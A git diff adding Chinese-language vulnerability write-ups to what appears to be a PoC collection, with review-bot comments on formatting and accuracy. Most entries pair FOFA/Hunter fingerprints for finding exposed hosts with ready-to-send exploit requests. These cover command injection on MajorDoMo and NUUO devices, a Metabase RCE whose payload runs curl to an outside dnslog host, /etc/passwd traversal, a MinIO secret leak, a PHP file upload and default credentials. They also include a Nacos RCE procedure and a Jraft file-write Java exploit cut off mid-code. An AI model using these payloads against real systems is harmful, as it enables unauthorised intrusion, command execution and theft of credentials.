diff --git a/MailCow存在Swagger未授权访问漏洞.md b/MailCow存在Swagger未授权访问漏洞.md new file mode 100644 index 0000000..5660965 --- /dev/null +++ b/MailCow存在Swagger未授权访问漏洞.md @@ -0,0 +1,23 @@ +# MailCow存在Swagger未授权访问漏洞 + +# 一、漏洞描述 +MailCow存在Swagger未授权访问漏洞 + +# 二、影响版本 +```plain +body="mailcow UI" +``` + +![1726728574313-fbbd314e-12b7-42e9-8b56-5f51102d7ca2.png](./img/DGUfk23vVpL0DKHY/1726728574313-fbbd314e-12b7-42e9-8b56-5f51102d7ca2-654594.png) + +# 三、漏洞复现 +```plain +/api/ +``` + +![1726728554359-ff8707e4-1509-43a2-a5d8-908081765a25.png](./img/DGUfk23vVpL0DKHY/1726728554359-ff8707e4-1509-43a2-a5d8-908081765a25-993923.png) + + + +> 更新: 2024-10-22 09:41:43 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vm2u62qvqqrsgzrq> \ No newline at end of file diff --git a/MajorDoMothumb未授权RCE漏洞(CNVD-2024-02175).md b/MajorDoMothumb未授权RCE漏洞(CNVD-2024-02175).md new file mode 100644 index 0000000..8150be7 --- /dev/null +++ b/MajorDoMothumb未授权RCE漏洞(CNVD-2024-02175).md 
@@ -0,0 +1,30 @@ +# MajorDoMo thumb未授权RCE漏洞(CNVD-2024-02175) + +# 一、漏洞简介 +MajorDoMo是MajorDoMo社区的一个开源DIY 智能家居Q自动化平台。MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行任意指令,获取服务器权限。 + +# 二、影响版本 ++ MajorDoMo< 0662e5e + +# 三、资产测绘 ++ fofa`app="MajordomoSL"` ++ 特征 + +![1713627397596-ec6aa3a7-c04f-4580-9b3f-5b5aea561b6d.png](./img/2ovjcaHaRtUQroVP/1713627397596-ec6aa3a7-c04f-4580-9b3f-5b5aea561b6d-828706.png) + +# 四、漏洞复现 +```plain +GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 +Accept-Charset: utf-8 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![1713627778412-e955f94f-c4ec-466d-b9ec-d72be405ea16.png](./img/2ovjcaHaRtUQroVP/1713627778412-e955f94f-c4ec-466d-b9ec-d72be405ea16-632435.png) + + + +> 更新: 2024-04-20 23:45:27 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nlakvnouzm2wkdy4> \ No newline at end of file diff --git a/MasterSAM接口downloadService任意文件读取.md b/MasterSAM接口downloadService任意文件读取.md new file mode 100644 index 0000000..eda18e4 --- /dev/null +++ b/MasterSAM接口downloadService任意文件读取.md @@ -0,0 +1,24 @@ +# MasterSAM接口downloadService任意文件读取 + +**MasterSAM Star Gate的/adamaladamalduwnoadService接口存在任意文件下载漏洞,未经身份验证的攻击者可以通过该漏洞下载服务器任意文件,从而获取大量敏感信息。** + +## fofa + +```javascript +body="MasterSAM" +``` + +## poc + +```javascript +GET /adama/adama/downloadService?type=1&file=../../../../etc/passwd HTTP/1.1 +Host: your-ip +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502131406477.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/f35n0-9OOME5gSsiwEv0Vg \ No newline at end of file diff --git a/Metabase-validate-远程命令执行漏洞(CVE-2023-38646).md b/Metabase-validate-远程命令执行漏洞(CVE-2023-38646).md new file mode 100644 index 0000000..b754759 --- /dev/null 
+++ b/Metabase-validate-远程命令执行漏洞(CVE-2023-38646).md @@ -0,0 +1,35 @@ +## Metabase validate 远程命令执行漏洞(CVE-2023-38646) +网络测绘 +app=“元数据库” + +/api/session/properties +``` +POST /api/setup/validate HTTP/1.1 +Host: +Content-Type: application/json +Content-Length: 812 + +{ + "token": "e56e2c0f-71bf-4e15-9879-d964f319be69", + "details": + { + "is_on_demand": false, + "is_full_sync": false, + "is_sample": false, + "cache_ttl": null, + "refingerprint": false, + "auto_run_queries": true, + "schedules": + {}, + "details": + { + "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl ecw14d.dnslog.cn')\n$$--=x", + "advanced-options": false, + "ssl": true + }, + "name": "an-sec-research-team", + "engine": "h2" + } +} + +``` diff --git a/Milesight-VPN任意文件读取漏洞.md b/Milesight-VPN任意文件读取漏洞.md new file mode 100644 index 0000000..f743a85 --- /dev/null +++ b/Milesight-VPN任意文件读取漏洞.md 
@@ -0,0 +1,43 @@ +# Milesight-VPN任意文件读取漏洞 + +# 一、漏洞简介 +Milesight-VPN是由Milesight Technology Co., Ltd.开发的一种集成了VPN功能的路由器产品。它旨在为用户提供安全、可靠的远程访问和连接解决方案。Milesight-VPN存在任意文件读取,攻击者可以通过利用系统中存在的漏洞,获取未经授权的访问权限并读取系统上的任意文件。 + +# 二、影响版本 ++ Milesight-VPN + +# 三、资产测绘 ++ fofa`app="Milesight-VPN"` ++ 特征 + +![1694363541225-b2d7009f-1a45-440f-9ce4-b9886ca6d50f.png](./img/hnnyUMi80IkIJfou/1694363541225-b2d7009f-1a45-440f-9ce4-b9886ca6d50f-861710.png) + +# 四、漏洞复现 +```plain +GET /../etc/passwd HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: cross-site +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1694363570704-5a0d5f4f-fc61-4977-80fc-964096a5034a.png](./img/hnnyUMi80IkIJfou/1694363570704-5a0d5f4f-fc61-4977-80fc-964096a5034a-296494.png) + +数据库配置 + +```java +/../milesight_vpn/server/connect.js +``` + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pp2gsuw28o5qcs9l> \ No newline at end of file diff --git a/MinIO存在信息泄露漏洞(CVE-2023-28432).md b/MinIO存在信息泄露漏洞(CVE-2023-28432).md new file mode 100644 index 0000000..167dd7f --- /dev/null +++ b/MinIO存在信息泄露漏洞(CVE-2023-28432).md 
@@ -0,0 +1,33 @@ +# MinIO存在信息泄露漏洞(CVE-2023-28432) + +# 一、漏洞简介 +MinIO是基于GNU Affero通用公共许可证v3.0发布的高性能对象存储。兼容Amazon S3云存储服务的API。使用MinIO为机器学习、分析和应用程序数据工作负载构建高性能基础设施。在集群模式中,MinIO的某些接口会因为信息处理不当而返回会返回所有环境变量,包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,导致敏感信息泄露。使用分布式部署的所有用户都会受到影响。 + +# 二、影响版本 ++ MinIO-Console + +# 三、资产测绘 ++ fofa`app="MinIO-Console"` + +![1716315120880-badae565-3d74-4618-82f2-e007a55b192e.png](./img/mDAR4TLtjAvbzixi/1716315120880-badae565-3d74-4618-82f2-e007a55b192e-789868.png) + +# 四、漏洞复现 +```plain +POST /minio/bootstrap/v1/verify HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 +``` + +![1721112869285-5be4e488-a938-4d94-972b-e751f22a0e91.png](./img/mDAR4TLtjAvbzixi/1721112869285-5be4e488-a938-4d94-972b-e751f22a0e91-230369.png) + + + +> 更新: 2024-09-05 23:24:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yrxgtl2ou0ils7bm> \ No newline at end of file diff --git a/MinIO存在默认口令漏洞.md b/MinIO存在默认口令漏洞.md new file mode 100644 index 0000000..f679159 --- /dev/null +++ b/MinIO存在默认口令漏洞.md @@ -0,0 +1,24 @@ +# MinIO存在默认口令漏洞 + +# 一、漏洞简介 +MinIO是基于GNU Affero通用公共许可证v3.0发布的高性能对象存储。兼容Amazon S3云存储服务的API。使用MinIO为机器学习、分析和应用程序数据工作负载构建高性能基础设施。MinIO存在默认口令漏洞 + +# 二、影响版本 ++ MinIO-Console + +# 三、资产测绘 ++ fofa`app="MinIO-Console"` + +![1716315120880-badae565-3d74-4618-82f2-e007a55b192e.png](./img/DH6NiDR61tGcTYxP/1716315120880-badae565-3d74-4618-82f2-e007a55b192e-461340.png) + +# 四、漏洞复现 +```plain +minioadmin/minioadmin +``` + +![1716353537032-5279d3f9-718f-443c-9b20-b761766c32c2.png](./img/DH6NiDR61tGcTYxP/1716353537032-5279d3f9-718f-443c-9b20-b761766c32c2-175600.png) + + + +> 更新: 2024-09-05 23:24:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vmaf89lengzpaw3e> \ No newline at end of file 
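Review bot: in MailCow存在Swagger未授权访问漏洞.md the section headed `二、影响版本` contains the fofa fingerprint `body="mailcow UI"` rather than a version, and the 资产测绘 section used by the other writeups is missing; move the fingerprint under 资产测绘 and either give the affected versions or state that they are unknown. The one-line 漏洞描述 merely repeats the title; say what `/api/` exposes.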
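Review bot: `开源DIY 智能家居Q自动化平台` in MajorDoMothumb未授权RCE漏洞(CNVD-2024-02175).md has a stray `Q`, and the bound `MajorDoMo< 0662e5e` under 影响版本 is a bare commit hash with no release mapping, so a reader cannot tell whether an installed release is affected; add the fixed release alongside the commit.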
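Review bot: the bold summary of MasterSAM接口downloadService任意文件读取.md names the endpoint `/adamaladamalduwnoadService`, which does not match the `/adama/adama/downloadService` path used in the poc; correct the summary. The fofa and poc fences are tagged `javascript` although they hold a FOFA query and a raw HTTP request.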
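Review bot: Metabase-validate-远程命令执行漏洞(CVE-2023-38646).md is not usable as written: the fingerprint `app=“元数据库”` has full-width quotes and a machine-translated product name, the bare line `/api/session/properties` is never tied to the `token` field in the JSON body (if the token is read from that response, say so, and mark the hard-coded value as per-instance), and `ecw14d.dnslog.cn` in the payload is the author's own callback domain and should be a labelled placeholder. `Content-Length: 812` will be wrong as soon as either value is edited; drop it or note that it must be recomputed. The file also lacks the 漏洞简介/影响版本 structure the other entries use.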
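Review bot: MinIO存在信息泄露漏洞(CVE-2023-28432).md lists only `MinIO-Console` under 影响版本 although the summary says every distributed deployment is affected; add the vulnerable and fixed release range from the upstream advisory so operators can check their version. The summary also contains the duplicated phrase `返回会返回所有环境变量`.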
diff --git a/Mitel企业协作平台任意文件读取漏洞.md b/Mitel企业协作平台任意文件读取漏洞.md new file mode 100644 index 0000000..cd90be0 --- /dev/null +++ b/Mitel企业协作平台任意文件读取漏洞.md @@ -0,0 +1,22 @@ +# Mitel企业协作平台任意文件读取漏洞 + +由于Mitel MiCollab软件的 NuPoint 统一消息 (NPM) 组件中存在身份验证绕过漏洞,并且输入验证不足,未经身份验证的远程攻击者可利用该漏洞执行路径遍历攻击,成功利用可能导致未授权访问、破坏或删除用户的数据和系统配置。 + +## fofa + +```javascript +body="MiCollab End User Portal" +``` + +## poc + +```javascript +POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Content-Type: application/x-www-form-urlencoded + +_transaction=<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">2</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><criteria xsi:type="xsd:Object"><reportName>../../../etc/passwd</reportName></criteria><operationConfig xsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValues xsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=x +``` + +![image-20241211213252626](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112132699.png) \ No newline at end of file diff --git a/NETGEARDGND3700v2路由器setup.cgi接口身份认证绕过漏洞.md b/NETGEARDGND3700v2路由器setup.cgi接口身份认证绕过漏洞.md new file mode 100644 index 0000000..b34745e --- /dev/null +++ b/NETGEARDGND3700v2路由器setup.cgi接口身份认证绕过漏洞.md 
@@ -0,0 +1,28 @@ +# NETGEAR DGND3700v2 路由器 setup.cgi 接口身份认证绕过漏洞 + +# 一、漏洞简介 +NETGEAR DGND3700v2 是一款高效的企业路由器,NETGEAR DGND3700v2 存在身份认证绕过漏洞,攻击者可利用漏洞读取用户账号密码,访问敏感信息页面。 + +# 二、影响版本 ++ NETGEAR DGND3700v2 + +# 三、资产测绘 ++ hunter`web.title="DGND3700v2"` + +# 四、漏洞复现 +```java +/setup.cgi?next_file=passwordrecovered.htm&foo=currentsetting.htm +``` + +![1702017292533-6337aabc-a1b3-455f-acee-a10ad3c20dfc.png](./img/frUEBsj0hfsCuNcA/1702017292533-6337aabc-a1b3-455f-acee-a10ad3c20dfc-883162.png) + +通过上述密码登录系统 + +`admin/password` + +![1702017321828-68b8d415-f1e3-459a-aec6-0ba1bbeedea3.png](./img/frUEBsj0hfsCuNcA/1702017321828-68b8d415-f1e3-459a-aec6-0ba1bbeedea3-446432.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nfl28ku7srgz3zrl> \ No newline at end of file diff --git a/NETGEARProSafeSSLVPNSQL注入(CNNVD-202205-3298).md b/NETGEARProSafeSSLVPNSQL注入(CNNVD-202205-3298).md new file mode 100644 index 0000000..c6c548b --- /dev/null +++ b/NETGEARProSafeSSLVPNSQL注入(CNNVD-202205-3298).md @@ -0,0 +1,27 @@ +# NETGEAR ProSafe SSL VPN SQL注入(CNNVD-202205-3298) + +# 一、漏洞简介 +NETGEAR FVS336G是美国网件(NETGEAR)公司的一款VPN(虚拟私人网络)防火墙路由器。NETGEAR ProSafe SSL VPN firmware FVS336Gv2 和FVS336Gv3版本存在安全漏洞,该漏洞源于cgi-bin/platform.cgi中的USERDBDomains.Domainname参数缺少过滤转义。攻击者可利用该漏洞进行SQL注入攻击,进而控制系统。 + +# 二、影响版本 ++ NETGEAR ProSafe SSL VPN + +# 三、资产测绘 ++ hunter`app.name=="NETGEAR ProSAFE"` ++ 特征 + +![1694579919965-2ed9bd62-7659-4f42-b63c-fbce7679b1ce.png](./img/3-oAw2G2HWdioD_W/1694579919965-2ed9bd62-7659-4f42-b63c-fbce7679b1ce-587289.png) + +# 四、漏洞复现 +**sqlmap ** + +```plain +sqlmap -u "https://xx.xx.xx.xx/scgi-bin/platform.cgi" --form -p USERDBDomains.Domainname --batch +``` + +![1694588675748-169097da-b0a4-4bb1-ae8b-f68709d318ee.png](./img/3-oAw2G2HWdioD_W/1694588675748-169097da-b0a4-4bb1-ae8b-f68709d318ee-692978.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mvw70mskzp0yhtyf> \ No newline at end of file 
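Review bot: Mitel企业协作平台任意文件读取漏洞.md has no 影响版本 section and no advisory or CVE reference even though the summary describes a specific NuPoint Unified Messaging (NPM) authentication bypass; add the vendor advisory and the fixed version, and retag the fofa/poc fences, which are marked `javascript` for a fingerprint and a raw HTTP POST.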
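Review bot: in NETGEARDGND3700v2路由器setup.cgi接口身份认证绕过漏洞.md the line `admin/password` after `通过上述密码登录系统` reads as a fixed default credential, but the preceding step shows the password being recovered from `passwordrecovered.htm`; clarify that `admin/password` is the value seen in the screenshot, not a constant. The ```java fence holds a URL path and should be ```plain like the rest of the repository.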
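Review bot: the summary in NETGEARProSafeSSLVPNSQL注入(CNNVD-202205-3298).md says the injection is in `cgi-bin/platform.cgi`, but the sqlmap command targets `/scgi-bin/platform.cgi`; reconcile the path. `**sqlmap **` has a trailing space inside the bold markers, which breaks the markup.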
diff --git a/NETGEARProSafeSSLVPN任意文件读取漏洞.md b/NETGEARProSafeSSLVPN任意文件读取漏洞.md new file mode 100644 index 0000000..192d212 Binary files /dev/null and b/NETGEARProSafeSSLVPN任意文件读取漏洞.md differ diff --git a/NUUO摄像头存在远程命令执行漏洞.md b/NUUO摄像头存在远程命令执行漏洞.md new file mode 100644 index 0000000..137c871 --- /dev/null +++ b/NUUO摄像头存在远程命令执行漏洞.md @@ -0,0 +1,29 @@ +# ​NUUO摄像头存在远程命令执行漏洞 + +# 一、漏洞简介 +NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。 + +# 二、影响版本 ++ NUUO摄像头 + +# 三、资产测绘 ++ hunter`web.title="Network Video Recorder Login"` ++ 特征 + +![1699193264623-ebc62d58-8540-4b12-b89e-50db1a27bdcc.png](./img/9KTLqutzFOqS5Otb/1699193264623-ebc62d58-8540-4b12-b89e-50db1a27bdcc-947661.png) + +# 四、漏洞复现 +```plain +GET /__debugging_center_utils___.php?log=;id HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive +``` + +![1699193298040-d4aa2125-175a-43e8-a65d-1c942d48ce5d.png](./img/9KTLqutzFOqS5Otb/1699193298040-d4aa2125-175a-43e8-a65d-1c942d48ce5d-663831.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qa3vprl34sg1ay3x> \ No newline at end of file diff --git a/NUUO摄像机debugging_center_utils远程代码执行漏洞.md b/NUUO摄像机debugging_center_utils远程代码执行漏洞.md new file mode 100644 index 0000000..f4100d4 --- /dev/null +++ b/NUUO摄像机debugging_center_utils远程代码执行漏洞.md @@ -0,0 +1,24 @@ +# NUUO摄像机debugging_center_utils远程代码执行漏洞 + +NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,NUUO摄像头debugging_center_utils存在未授权命令执行漏洞,攻击者可以获取服务器权限 + +## fofa + +```javascript +body="www.nuuo.com/eHelpdesk.php" +``` + +## poc + +```javascript +GET /__debugging_center_utils___.php?log=;id HTTP/1.1 +Host: +Priority: u=0, i +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0 +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502201149700.png) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/uC-qg8DN8MxNGPKaV3Utgw \ No newline at end of file 
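Review bot: NETGEARProSafeSSLVPN任意文件读取漏洞.md is committed as a binary blob (`Binary files /dev/null and b/NETGEARProSafeSSLVPN任意文件读取漏洞.md differ`), so it neither renders nor can be reviewed; the file was most likely saved in a non-UTF-8 encoding or contains NUL bytes. Re-save it as UTF-8 text and recommit.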
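Review bot: NUUO摄像头存在远程命令执行漏洞.md and NUUO摄像机debugging_center_utils远程代码执行漏洞.md document the same request, `GET /__debugging_center_utils___.php?log=;id`, with the same product description; keep one entry (or make the second a cross-link) so the two copies do not drift apart.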
diff --git a/NUUO摄像机handle_config.php远程代码执行漏洞.md b/NUUO摄像机handle_config.php远程代码执行漏洞.md new file mode 100644 index 0000000..063ed5e --- /dev/null +++ b/NUUO摄像机handle_config.php远程代码执行漏洞.md @@ -0,0 +1,18 @@ +# NUUO摄像机handle_config.php远程代码执行漏洞 + +NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,NUUO摄像头handle_config.php存在未授权命令执行漏洞,攻击者可以获取服务器权限 + +## fofa + +```javascript +body="www.nuuo.com/eHelpdesk.php" +``` + +## poc + +```javascript +GET /handle_config.php?log=;id; HTTP/1.1 +Host: +``` + +![image-20250219141445999](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502191414249.png) \ No newline at end of file diff --git a/NUUO摄像机handle_site_config远程代码执行漏洞.md b/NUUO摄像机handle_site_config远程代码执行漏洞.md new file mode 100644 index 0000000..e42670b --- /dev/null +++ b/NUUO摄像机handle_site_config远程代码执行漏洞.md @@ -0,0 +1,20 @@ +# NUUO摄像机handle_site_config远程代码执行漏洞 + +NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,NUUO摄像头handle_site_config.php存在未授权命令执行漏洞,攻击者可以获取服务器权限 + +## fofa + +```javascript +body="www.nuuo.com/eHelpdesk.php" +``` + +## poc + +```javascript +GET /handle_site_config.php?log=;id; HTTP/1.1 +Host: +Priority: u=0, i +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0 +``` + +![image-20250219154105386](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502191541564.png) \ No newline at end of file diff --git a/NUUO网络视频录像机css_parser.php任意文件读取漏洞.md b/NUUO网络视频录像机css_parser.php任意文件读取漏洞.md new file mode 100644 index 0000000..61b8f18 --- /dev/null +++ b/NUUO网络视频录像机css_parser.php任意文件读取漏洞.md 
@@ -0,0 +1,23 @@ +# NUUO网络视频录像机css_parser.php任意文件读取漏洞 + +NUUO网络视频录像机 css_parser.php 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +body="www.nuuo.com/eHelpdesk.php" +``` + +## poc + +```javascript +GET /css_parser.php?css=css_parser.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![image-20240911095835420](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409110958603.png) \ No newline at end of file diff --git a/NUUO网络视频录像机upload.php任意文件上传漏洞.md b/NUUO网络视频录像机upload.php任意文件上传漏洞.md new file mode 100644 index 0000000..2178820 --- /dev/null +++ b/NUUO网络视频录像机upload.php任意文件上传漏洞.md @@ -0,0 +1,34 @@ +# NUUO网络视频录像机upload.php任意文件上传漏洞 + +NUUO网络视频录像机upload.php任意文件上传漏洞,未经身份验证攻击者可通过该漏洞上传恶意文件,造成服务器沦陷。 + +## fofa + +```javascript +body="www.nuuo.com/eHelpdesk.php" +``` + +## poc + +```javascript +POST /upload.php HTTP/1.1 +Host: +Cache-Control: max-age=0 +Accept-Language: zh-CN +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Content-Type: multipart/form-data; boundary=--------ok4o88lom +accept: */* +Content-Length: 155 + +----------ok4o88lom +Content-Disposition: form-data; name="userfile"; filename="test.php" + +<?php phpinfo();@unlink(__FILE__);?> +----------ok4o88lom-- +``` + +![5c2e597f5b4233b5e694d71104f622e9](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251439472.jpg) \ No newline at end of file 
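Review bot: in NUUO网络视频录像机css_parser.php任意文件读取漏洞.md the summary lists `数据库配置文件` twice (`(如数据库配置文件、系统配置文件)、数据库配置文件等等`); the poc reads `css_parser.php` itself, which is a sensible low-impact verification (it only discloses the source of the vulnerable script), so say that explicitly instead of the generic sentence. The handle_config.php and handle_site_config.php writeups reuse this description template with only the script name changed; one NUUO entry listing the affected scripts would be easier to maintain.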
diff --git a/NacosDerby远程命令执行漏洞(QVD-2024-26473).md b/NacosDerby远程命令执行漏洞(QVD-2024-26473).md new file mode 100644 index 0000000..8a20645 --- /dev/null +++ b/NacosDerby远程命令执行漏洞(QVD-2024-26473).md 
@@ -0,0 +1,50 @@ +# Nacos Derby 远程命令执行漏洞(QVD-2024-26473) + +# <font style="color:rgb(51, 51, 51);">一、漏洞简介</font> +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在远程命令执行漏洞</font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos 2.3.2</font> + +# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ fofa `icon_hash="13942501"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/4dqBYlUSthO-Pvor/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-111429.png) + +# 四、漏洞复现 +前置条件: + +```plain +1、需要naocs没有做鉴权,或者能登录后台获取凭证 +2、需要使用的是derby数据库,如果是mysql就不行 +``` + +准备3个文件 + +[exploit.py](https://www.yuque.com/attachments/yuque/0/2024/txt/29512878/1730102385434-bed3e0d1-f9aa-4fb0-97bf-58e02f1536a0.txt)[server.py](https://www.yuque.com/attachments/yuque/0/2024/txt/29512878/1730102385723-5c0ce8e6-955e-45d3-8edd-930373ebf091.txt)[config.py](https://www.yuque.com/attachments/yuque/0/2024/txt/29512878/1730102385874-06c45712-f176-431c-8a7e-aee74aa7a07e.txt) + +1、修改config.py内容,host为自己的ip地址,port为自己电脑没有被占用的端口 + +```plain +server_host = '192.168.40.110' +server_port = 9999 +``` + +2、然后直接运行命令python service.py 启动web服务,记住安装flask和requests的py模块 + +![1729316386052-7a74660b-9c2d-4bf8-9bf4-18d530e6d432.png](./img/4dqBYlUSthO-Pvor/1729316386052-7a74660b-9c2d-4bf8-9bf4-18d530e6d432-314080.png) + +3、启动成功后,再运行python exploit.py,输入目标nacos地址即可执行命令 + +![1729316438195-42be8be8-5687-4574-98c1-09281b2c1d62.png](./img/4dqBYlUSthO-Pvor/1729316438195-42be8be8-5687-4574-98c1-09281b2c1d62-442473.png) + +ping dnslog测试 + +![1729316528783-0d8ad515-f41b-4b4c-828d-f10beeeae9ad.png](./img/4dqBYlUSthO-Pvor/1729316528783-0d8ad515-f41b-4b4c-828d-f10beeeae9ad-630788.png) + + + +> 更新: 2024-10-28 15:59:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dr4623v0c8wevsk2> \ No newline at end of file 
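Review bot: step 2 in NacosDerby远程命令执行漏洞(QVD-2024-26473).md says to run `python service.py`, but the file provided is `server.py`; also `naocs` in the 前置条件 block should be `nacos`, and the three scripts are only linked as yuque `.txt` attachments rather than committed, so the entry is not self-contained. The two prerequisites (no authentication, Derby rather than MySQL) are the useful exposure check for operators; state them under 漏洞简介 as well.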
diff --git a/Nacos任意文件读写漏洞.md b/Nacos任意文件读写漏洞.md new file mode 100644 index 0000000..5e395b6 --- /dev/null +++ b/Nacos任意文件读写漏洞.md 
@@ -0,0 +1,82 @@ +# Nacos任意文件读写漏洞 + +在Nacos<=2.4.0.1版本中集群模式启动下存在名为naming_persistent_service的Group,该Group所使用的Processor为com.alibaba.nacos.naming.consistency.persistent.impl.PersistentServiceProcessor类型Processor,在进行处理过程中会触发其父类`onApply`或`onRequest`方法,这两个方法会分别造成任意文件写入删除和任意文件读取 + +官方社区公告:https://nacos.io/blog/announcement-nacos-security-problem-file/ + +漏洞出现在Jraft服务(默认值7848) + +## fofa + +```java +title="Nacos" +``` + +## 任意文件写入 + +```java +public static void send(String addr, byte[] payload) throws Exception { + Configuration conf = new Configuration(); + conf.parse(addr); + RouteTable.getInstance().updateConfiguration("nacos", conf); + CliClientServiceImpl cliClientService = new CliClientServiceImpl(); + cliClientService.init(new CliOptions()); + RouteTable.getInstance().refreshLeader(cliClientService, "nacos", 1000).isOk(); + PeerId leader = PeerId.parsePeer(addr); + Field parserClasses = cliClientService.getRpcClient().getClass().getDeclaredField("parserClasses"); + parserClasses.setAccessible(true); + ConcurrentHashMap map = (ConcurrentHashMap) parserClasses.get(cliClientService.getRpcClient()); + map.put("com.alibaba.nacos.consistency.entity.WriteRequest", WriteRequest.getDefaultInstance()); + MarshallerHelper.registerRespInstance(WriteRequest.class.getName(), WriteRequest.getDefaultInstance()); + final WriteRequest writeRequest = WriteRequest.newBuilder().setGroup("naming_persistent_service").setData(ByteString.copyFrom(payload)).setOperation("Write").build(); + Object o = cliClientService.getRpcClient().invokeSync(leader.getEndpoint(), writeRequest, 5000); + System.out.println(o); +} + +public static void main(String[] args) throws Exception { + String address = "192.168.3.153:7848"; + BatchWriteRequest request = new BatchWriteRequest(); + 